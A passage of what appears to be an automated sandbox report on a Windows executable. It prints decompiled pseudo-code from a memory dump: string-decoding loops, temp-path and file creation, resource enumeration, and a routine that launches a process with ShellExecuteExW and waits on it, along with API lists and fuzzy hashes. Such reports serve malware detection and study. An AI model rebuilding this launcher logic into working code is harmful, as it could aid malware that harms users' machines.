					_t400 = _t399;
					E0040DFC0(_t400);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x417030, _t261);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160f4;
				_v8 = 0;
				while(1) {
					_t439 = 9 - _v8;
					if(9 < _v8) {
						break;
					}
					_t242 =  *0x41702c; // 0x41609a
					_v4 =  *_t242;
					 *0x41702c =  *0x41702c + 1;
					_t244 = E0040DE20();
					_t393 = _t348;
					_push(_t244);
					_push(_t393);
					_t245 = E0040DE20();
					E00405D60(_t439, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t245);
					_t395 =  *0x417080; // 0x2760500
					_t249 = E0040DE20();
					_t396 = _t395;
					E0040DFC0(_t396);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x417080, _t249);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x41608c;
				_v8 = 0;
				while(1) {
					_t441 = 4 - _v8;
					if(4 < _v8) {
						break;
					}
					_t230 =  *0x41702c; // 0x41609a
					_v4 =  *_t230;
					 *0x41702c =  *0x41702c + 1;
					_t232 = E0040DE20();
					_t389 = _t348;
					_push(_t232);
					_push(_t389);
					_t233 = E0040DE20();
					E00405D60(_t441, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t233);
					_t391 =  *0x41705c; // 0x2767f90
					_t237 = E0040DE20();
					_t392 = _t391;
					E0040DFC0(_t392);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x41705c, _t237); // executed
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x41610b;
				_v8 = 0;
				while(1) {
					_t443 = 3 - _v8;
					if(3 < _v8) {
						break;
					}
					_t218 =  *0x41702c; // 0x41609a
					_v4 =  *_t218;
					 *0x41702c =  *0x41702c + 1;
					_t220 = E0040DE20();
					_t385 = _t348;
					_push(_t220);
					_push(_t385);
					_t221 = E0040DE20();
					E00405D60(_t443, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t221);
					_t387 =  *0x417058; // 0x2769340
					_t225 = E0040DE20();
					_t388 = _t387;
					E0040DFC0(_t388);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x417058, _t225);
					_v40 = _v40 + 1;
					_t444 = _v40;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				_t349 =  *0x417058; // 0x2769340
				_t114 = E0040DE20();
				_t350 = _t349;
				E0040DFC0(_t350);
				_t351 = _a8;
				E0040DFC0(_t351);
				E0040DE60(0x417058, _t114);
				_t119 = E0040DE20();
				_t352 = _t351;
				E00403275(_t421, _t423, _v8, _v4);
				E0040DE60( &_v0, _t119);
				_v4 = E004097FE();
				 *0x41704c = GetModuleHandleW(0);
				_t125 = E0040DE20();
				_t353 = _t352;
				_push(_t125);
				_t126 = E0040DE20();
				_t354 = _t353;
				_push(_t126);
				_t127 = E0040DE20();
				_t355 = _t354;
				_push(_t127);
				_t128 = E0040DE20();
				_t356 = _t355;
				E00405182(E0040D0A0( *0x417040, 1, _t128));
				_v64 = _v64 + _t356;
				E00405E50(_t347, _t444);
				_push( &_v20);
				E0040DE60();
				_t134 = E0040DE20();
				_t357 = _t356;
				_push(_t134);
				_t135 = E0040DE20();
				_t358 = _t357;
				_push(_t135);
				_t136 = E0040DE20();
				_t359 = _t358;
				_push(_t136);
				_t137 = E0040DE20();
				_t360 = _t359;
				E00405182(E0040D0A0(_v28, 1, _t137));
				 *_t424 =  *_t424 + _t360;
				E00405E50(_t347, _t444);
				_push( &_v48);
				E0040DE60();
				_v56 = E00402E9D(_v56);
				_t144 = E0040DE20();
				_t361 = _t360;
				E004051A0(E004021A4(_t347, _t361, _t421, _t422, _v56, _t144));
				E0040195B(_t361);
				E0040460E(_t361, _t422, _v64);
				_t149 = E0040DE20();
				_t362 = _t361;
				_push(_t149);
				_push(_v100);
				_push(_v68 + 4);
				_pop(_t150);
				_t151 = E00405100(_t150);
				E0040358D(_t422);
				E0040DE60(0x417048, _t151);
				PathRemoveBackslashW( *0x417048);
				E0040213E(_v84);
				_t157 = E0040DE20();
				_t363 = _t362;
				_push(_t157);
				_t158 = E0040DE20();
				_t364 = _t363;
				E00402BFA(_t444,  *0x417048);
				E00405182(E0040E020(_t347));
				_v144 = _v144 + _t364;
				E004051A0(E00409860(_v108, _t158));
				_t365 =  *0x417024; // 0x2768958
				_t164 = E0040DE20();
				_t366 = _t365;
				E0040DFC0(_t366);
				_t367 =  *0x417058; // 0x2769340
				E0040DFC0(_t367);
				E0040DE60(0x417058, _t164);
				_t169 = E0040DE20();
				_t368 = _t367;
				E00401E55(_t368, _t422, _t444, _v128);
				E0040DE60( &_v120, _t169);
				E00403855(_t347, _t421);
				_t369 =  *0x417038; // 0x27689d0
				_t174 = E0040DE20();
				_t370 = _t369;
				E0040DFC0(_t370);
				E0040DE60( &_v128, _t174);
				PathQuoteSpacesW(_v136);
				_push(_v136);
				_t178 = E0040DE20();
				_pop(_t372);
				E0040DFC0(_t372);
				E0040DFC0(0x416026);
				_t374 = _v148;
				E0040DFC0(_t374);
				E0040DE60( &_v152, _t178);
				PathQuoteSpacesW(_v160);
				_t328 =  *0x417060; // 0x0
				_t445 = _t328 - 1;
				if(_t328 != 1) {
					E00402CA9(_t421, _t422, _a28);
				} else {
					 *0x417010 = E00405492(_t328, E00402CA9, _a28);
				}
				_push(_t374);
				_push(E0040DE20());
				_push( *((intOrPtr*)(_t424 + 0x1c)));
				_t186 = E0040DE20();
				_pop(_t377);
				_push(_t186);
				E0040DFC0(_t377);
				E0040DFC0(0x416026);
				_t379 = _a28;
				E0040DFC0(_t379);
				E0040E020(_t347);
				_t191 = E0040DE20();
				_t380 = _t379;
				_push(_t191);
				_push(_t380);
				E0040A795(_t445, E0040DE20());
				E0040E020(_t347);
				_push(_a4);
				_t195 = E0040DE20();
				_pop(_t383);
				E0040DFC0(_t383);
				_t384 = _v16;
				_t198 = E00405182(E0040DFC0(_t384));
				_v52 = _v52 + _t384;
				_t199 = E00405182(_t198);
				_v48 = _v48 + _t384;
				E00405182(_t199);
				_v44 = _v44 + _t384;
				_a4 = E004051A0(E00402022(), _t195);
				_push(_a4);
				E00401FA9(_t328);
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(0, _v16), _v12), _v52), _v52), _v64), _v56), _v28), _v52),  *((intOrPtr*)(_t424 + 0x1c))), _v68);
			}

APIs

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040DEBC

GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02769340,00000000,00000000), ref: 004042FB
PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4

Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32 ref: 00402C34

Part of subcall function 0040E020: TlsGetValue.KERNEL32(0000001B,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E02A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00409860: SetEnvironmentVariableW.KERNELBASE(02769340,02769340,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879

Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02769340,02768958,00000000,00000000), ref: 00401E8A

PathQuoteSpacesW.SHLWAPI(00000000,00000001,027689D0,00000000,00000000,00000000,00000000,00000000,02769340,02768958,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,00416026,00000000,00000000,00000000,00000001,027689D0,00000000,00000000,00000000,00000000,00000000,02769340,02768958), ref: 004044E1

Part of subcall function 00405492: CreateThread.KERNEL32 ref: 004054AB
Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523

Strings

&`A, xrefs: 004044BE
&`A, xrefs: 0040452C
`A, xrefs: 00404090

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
String ID: &`A$&`A$`A
API String ID: 1881381519-2092548216
Opcode ID: d8c64dcd585f1b5e06573cdc086111ceee2949358ebd607d45979ef17bbfe3ff
Instruction ID: 95625e34f548e5502c8bb68b533fb61ff434c3c21d69ae2a44b2ba18bfe99ca0
Opcode Fuzzy Hash: d8c64dcd585f1b5e06573cdc086111ceee2949358ebd607d45979ef17bbfe3ff
Instruction Fuzzy Hash: 1822E9B5914700AED200BBF1DD8197F77BDEB98718F10D83FB540AA192CA3CD8465B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6F6, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040A6F6(void* __eflags, intOrPtr _a4) {
				_Unknown_base(*)()* _t9;
				signed int _t11;
				signed int _t12;
				void* _t13;
				WCHAR* _t14;
				struct HINSTANCE__* _t17;

				_t14 = E0040E200(0x104, _a4);
				_t12 = GetTempPathW(0x104, _t14);
				_t17 = LoadLibraryW(L"Kernel32.DLL");
				if(_t17 != 0) {
					_t9 = GetProcAddress(_t17, "GetLongPathNameW");
					if(_t9 != 0) {
						_t11 =  *_t9(_t14, _t14, 0x104); // executed
						_t12 = _t11;
					}
					FreeLibrary(_t17);
				}
				E0040E350(_t13, 0x104 - _t12);
				_t14[_t12] = 0;
				return 0;
			}

0x0040a709
0x0040a718
0x0040a720
0x0040a724
0x0040a72c
0x0040a734
0x0040a739
0x0040a73b
0x0040a73b
0x0040a73e
0x0040a73e
0x0040a747
0x0040a74e
0x0040a756

APIs

Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040E267

GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A70D
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A71A
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A72C
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A739
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A73E

Strings

GetLongPathNameW, xrefs: 0040A726
Kernel32.DLL, xrefs: 0040A713

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 1993255246-2943376620
Opcode ID: d718137a791e701f6bd57810b192c1db4f572494fd9ecd74e792e9dadcbe4658
Instruction ID: 764606bb569eff9aa2a854e4b0558f5753b22c8873abefb13c435e0df7790d1f
Opcode Fuzzy Hash: d718137a791e701f6bd57810b192c1db4f572494fd9ecd74e792e9dadcbe4658
Instruction Fuzzy Hash: B4F0E9322012147FC2102BB6AC4CEEB3E6CDF95755701443AF904E2251DB69CC20C2BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA60, Relevance: 9.2, APIs: 6, Instructions: 157
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AA60(void* _a4, WCHAR* _a8, intOrPtr _a12, long _a16) {
				long _v4;
				long _v8;
				intOrPtr _t49;
				void* _t50;
				long _t52;
				long _t53;
				long _t61;
				void* _t62;
				long _t64;
				long _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t68 = _a16;
				_t73 = 0;
				_t70 = _t68 & 0x0000001f;
				_v8 = _t70;
				if(_t70 == 0) {
					_v8 = 2;
				}
				_t72 = E0040D438( *0x41771c, _a4);
				if(_t72 == 0) {
					L40:
					return _t73;
				} else {
					_t49 = _a12;
					if(_t49 != 1) {
						if(_t49 != 2) {
							if(_t49 != 3) {
								_t71 = _a16;
								goto L23;
							} else {
								_t61 = 0;
								_a16 = 0;
								if((_t68 & 0x00020000) != 0) {
									_t61 = 1;
									_a16 = 1;
								}
								if((_t68 & 0x00040000) != 0) {
									_t61 = _t61 | 0x00000007;
									_a16 = _t61;
								}
								_t62 = CreateFileW(_a8, 0xc0000000, _t61, 0, 2, 0x80, 0); // executed
								_t71 = _t62;
								if(_t71 != 0xffffffff) {
									goto L24;
								} else {
									_t71 = CreateFileW(_a8, 0x40000000, _a16, 0, 5, 0, 0);
									goto L23;
								}
							}
						} else {
							_t64 = 0;
							if((_t68 & 0x00020000) != 0) {
								_t64 = 1;
							}
							if((_t68 & 0x00040000) != 0) {
								_t64 = _t64 | 0x00000007;
							}
							_t71 = CreateFileW(_a8, 0xc0000000, _t64, 0, 4, 0x80, 0);
							goto L23;
						}
					} else {
						_t66 = 0;
						if((_t68 & 0x00020000) != 0) {
							_t66 = 1;
						}
						if((_t68 & 0x00040000) != 0) {
							_t66 = _t66 | 0x00000007;
						}
						_t67 = CreateFileW(_a8, 0x80000000, _t66, 0, 3, 0x80, 0); // executed
						_t71 = _t67;
						L23:
						if(_t71 == 0xffffffff) {
							L36:
							_t50 = _a4;
							goto L37;
						} else {
							L24:
							if(_t71 == 0) {
								goto L36;
							} else {
								_t52 =  *0x41612c; // 0x1000
								if(_t52 == 0 || (_t68 & 0x00080000) != 0) {
									 *(_t72 + 4) = _t73;
								} else {
									 *(_t72 + 4) = HeapAlloc( *0x417008, 0, _t52);
								}
								 *_t72 = _t71;
								_t53 =  *0x41612c; // 0x1000
								 *(_t72 + 8) = _t53;
								 *(_t72 + 0x18) = _v8;
								 *(_t72 + 0xc) = _t73;
								 *(_t72 + 0x14) = 1;
								 *(_t72 + 0x1c) = 0 | _a12 == 0x00000001;
								if(_a12 == 2 && (_t68 & 0x00100000) != 0) {
									_v4 = _t73;
									SetFilePointer(_t71, 0,  &_v4, 2);
								}
								_t50 = _a4;
								_t73 = _t72;
								if(_t50 != 0xffffffff) {
									_t73 = _t71;
								}
								if(_t73 == 0) {
									L37:
									if(_t50 != 0xffffffff) {
										_t72 = _t50;
									}
									E0040D3AA( *0x41771c, _t72);
									goto L40;
								} else {
									return _t73;
								}
							}
						}
					}
				}
			}

APIs

CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AAD1
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AB12
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AB5C
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000001,00000000), ref: 0040AB7E
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000001,00000000), ref: 0040ABB7
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC0A

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Create$AllocHeapPointer
String ID:
API String ID: 4207849991-0
Opcode ID: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
Instruction ID: 35cb0034da6faa60fecaa9fe6ab12df6337e8788845343623408397181d4bc5b
Opcode Fuzzy Hash: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
Instruction Fuzzy Hash: E451B171204300ABE3218E28DC44B57BAE5EB44764F614A3AFA51A62E0D779EC55CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7B9, Relevance: 7.6, APIs: 5, Instructions: 106
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D7B9(intOrPtr _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
				intOrPtr _v0;
				signed char _t32;
				void* _t33;
				intOrPtr* _t41;
				intOrPtr _t47;
				signed int _t49;
				void* _t50;
				signed int _t52;
				signed int _t54;
				intOrPtr* _t55;
				void* _t56;
				signed int _t58;

				_t32 = _a16;
				_t50 = 4;
				_t49 = _a4 + _t50;
				_t54 = _t32 & 0x00000003;
				_t56 = 0;
				_t52 = _t49 & 0x00000003;
				if(_t52 != 0) {
					_t49 = _t49 + _t50;
				}
				if((_t32 & 0x00000004) == 0) {
					_t33 = RtlAllocateHeap( *0x417008, 0, 0x38); // executed
					_t56 = _t33;
					if(_t56 != 0) {
						 *((intOrPtr*)(_t56 + 0x14)) = _v0;
						 *((intOrPtr*)(_t56 + 0x18)) = _a4;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *((intOrPtr*)(_t56 + 8)) = 0;
						 *(_t56 + 0x10) = _t49;
						if(_t54 == 1 || _t54 == 0) {
							 *((intOrPtr*)(_t56 + 0x1c)) = 1;
							_t31 = _t56 + 0x20; // 0x20
							InitializeCriticalSection(_t31);
						} else {
							 *((intOrPtr*)(_t56 + 0x1c)) = 0;
						}
					}
					goto L21;
				} else {
					E0040D9E3(_t50, 0x417614, E0040D982);
					EnterCriticalSection(0x41761c);
					_t41 =  *0x417618; // 0x810fa8
					_t58 = _a8;
					while(_t41 != 0) {
						if( *((intOrPtr*)(_t41 + 0xc)) != _t49 ||  *((intOrPtr*)(_t41 + 0x10)) != _t58) {
							_t41 =  *_t41;
							continue;
						} else {
							 *((intOrPtr*)(_t41 + 0x14)) =  *((intOrPtr*)(_t41 + 0x14)) + 1;
							_t56 =  *(_t41 + 8);
							if(_t56 != 0) {
								L15:
								LeaveCriticalSection(0x41761c);
								L21:
								return _t56;
							}
							L10:
							_t55 = HeapAlloc( *0x417008, 0, 0x18);
							if(_t55 != 0) {
								_t12 = _t49 - 4; // -4
								_t56 = E0040D7B9(_t12, _a8, _a12, _t58 & 0xfffffffb);
								if(_t56 != 0) {
									_t47 =  *0x417618; // 0x810fa8
									 *((intOrPtr*)(_t56 + 8)) = _t55;
									 *(_t55 + 4) =  *(_t55 + 4) & 0x00000000;
									 *(_t55 + 8) = _t56;
									 *(_t55 + 0xc) = _t49;
									 *(_t55 + 0x10) = _t58;
									 *((intOrPtr*)(_t55 + 0x14)) = 1;
									 *_t55 = _t47;
									if(_t47 != 0) {
										 *((intOrPtr*)(_t47 + 4)) = _t55;
									}
									 *0x417618 = _t55;
								}
							}
							goto L15;
						}
					}
					goto L10;
				}
			}

APIs

EnterCriticalSection.KERNEL32(0041761C,00417614,0040D982,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D7FA
HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D831
LeaveCriticalSection.KERNEL32(0041761C,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D88A
RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D89B
InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8D7

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
String ID:
API String ID: 1272335518-0
Opcode ID: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
Instruction ID: 1c1621ef8b81eb37d3c39fa836f306ed5b79470d652240547c7f2301dbf87725
Opcode Fuzzy Hash: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
Instruction Fuzzy Hash: DE31A2B2D007019BC3209F99D844A57BBF4FB44760B15C53EE465A7390D738E908CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402022, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402022() {
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				int _t39;
				int _t41;
				long _t43;
				void* _t51;
				intOrPtr* _t55;
				intOrPtr* _t57;

				_t51 = 0x14;
				do {
					_t57 = _t57 - 4;
					 *_t57 = 0;
					_t51 = _t51 - 1;
				} while (_t51 != 0);
				E0040DF60();
				E00405060(_t57,  *((intOrPtr*)(_t57 + 0x5c)));
				E00405060(_t57 + 4,  *((intOrPtr*)(_t57 + 0x60)));
				E00405060(_t57 + 8,  *((intOrPtr*)(_t57 + 0x64)));
				_t55 = _t57 + 0xc;
				 *_t55 = 0x3c;
				 *((intOrPtr*)(_t55 + 4)) = 0x140;
				 *((intOrPtr*)(_t55 + 0x1c)) = 0;
				_push(L"open");
				_pop(_t31);
				 *((intOrPtr*)(_t55 + 0xc)) = _t31;
				_t33 =  *_t57;
				 *((intOrPtr*)(_t55 + 0x10)) = _t33;
				_t35 =  *((intOrPtr*)(_t57 + 8));
				 *((intOrPtr*)(_t55 + 0x14)) = _t35;
				_t37 =  *((intOrPtr*)(_t57 + 4));
				 *((intOrPtr*)(_t55 + 0x18)) = _t37;
				_t39 = ShellExecuteExW(_t57 + 0xc); // executed
				 *(_t57 + 0x48) = _t39;
				while(1) {
					_push(0x19); // executed
					E00405532(); // executed
					_t41 = GetExitCodeProcess( *(_t57 + 0x48), _t57 + 0x4c); // executed
					if(_t41 != 0 &&  *(_t57 + 0x4c) != 0x103) {
						break;
					}
				}
				_t43 =  *(_t57 + 0x4c);
				return E0040DEF0(E0040DEF0(E0040DEF0(_t43,  *_t57),  *((intOrPtr*)(_t57 + 4))),  *((intOrPtr*)(_t57 + 8)));
			}

APIs

ShellExecuteExW.SHELL32(?), ref: 004020A7
GetExitCodeProcess.KERNEL32 ref: 004020C6

Strings

open, xrefs: 0040207E, 00402083, 0040208B

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeExecuteExitProcessShell
String ID: open
API String ID: 1016612177-2758837156
Opcode ID: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
Instruction ID: f63886f370766692049a8ab09fc70fe74b01992a8596c344147a8d3c31b217da
Opcode Fuzzy Hash: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
Instruction Fuzzy Hash: E9218971008309AFD700EF64C845A9FBBE9EF44308F10882EF198A6291DB79D905DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00401B8F, Relevance: 4.7, APIs: 3, Instructions: 233
libraryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00401B8F(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr __ebp;
				void* _t28;
				void* _t29;
				void* _t30;
				struct HINSTANCE__* _t33;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				struct HINSTANCE__** _t56;
				void* _t57;

				_t57 = __eflags;
				_t51 = __edx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040DF60();
				_t28 = E0040DE20();
				_t52 = _t51;
				_push(_t28);
				_push(2);
				_push(0);
				_t29 = E0040DE20();
				_t53 = _t52;
				_push(_t29);
				_t30 = E0040DE20();
				_t54 = _t53;
				E00405182(E00409638(_t57, _t30));
				 *_t56 =  *_t56 + _t54; // executed
				_t33 = LoadLibraryExW(??, ??, ??); // executed
				 *_t56 = E004051A0(_t33);
				EnumResourceTypesW(_t56[2], E00402109, 0);
				FreeLibrary( *_t56);
				if(E0040A3E3( *0x4170a8) <= 0) {
					goto L1;
				} else {
					__eax = E0040A3ED( *0x4170a8);
					while(1) {
						__eax = E0040A402( *0x4170a8);
						__eax = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							break;
						}
						__ebp =  *0x4170ac; // 0x0
						__edx =  *((intOrPtr*)(__ebp + 8));
						_push( *((intOrPtr*)(__ebp + 8)));
						__eax = E0040DE20();
						_pop(__edx);
						E0040DFC0(__edx) = __esp + 8;
						__eax = E0040DE60(__esp + 8, __esp + 8);
						__eax = E00405D80( *((intOrPtr*)(__esp + 4)));
						__eflags = __eax - 0xa;
						if(__eax <= 0xa) {
							__edx =  *((intOrPtr*)(__esp + 4));
							_push( *((intOrPtr*)(__esp + 4)));
							__eax = E0040DE20();
							_pop(__edx);
							E0040DFC0(__edx) = __esp + 0x10;
							__eax = E0040DE60(__esp + 0x10, __esp + 0x10);
						} else {
							__edx =  *((intOrPtr*)(__esp + 8));
							_push( *((intOrPtr*)(__esp + 8)));
							__eax = E0040DE20();
							_pop(__edx);
							__eax = E0040DFC0(__edx);
							__edx =  *((intOrPtr*)(__esp + 8));
							E0040DFC0( *((intOrPtr*)(__esp + 8))) = __esp + 0xc;
							__eax = E0040DE60(__esp + 0xc, __esp + 0xc);
						}
					}
					_push( *0x4170a8);
					__eax = E0040A436();
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					_push(1);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					E00405DB0( *((intOrPtr*)(__esp + 0x24))) = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					E0040D0A0() = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					__eax = __esp + 0x14;
					_push(__esp + 0x14);
					__eax = E0040DE60();
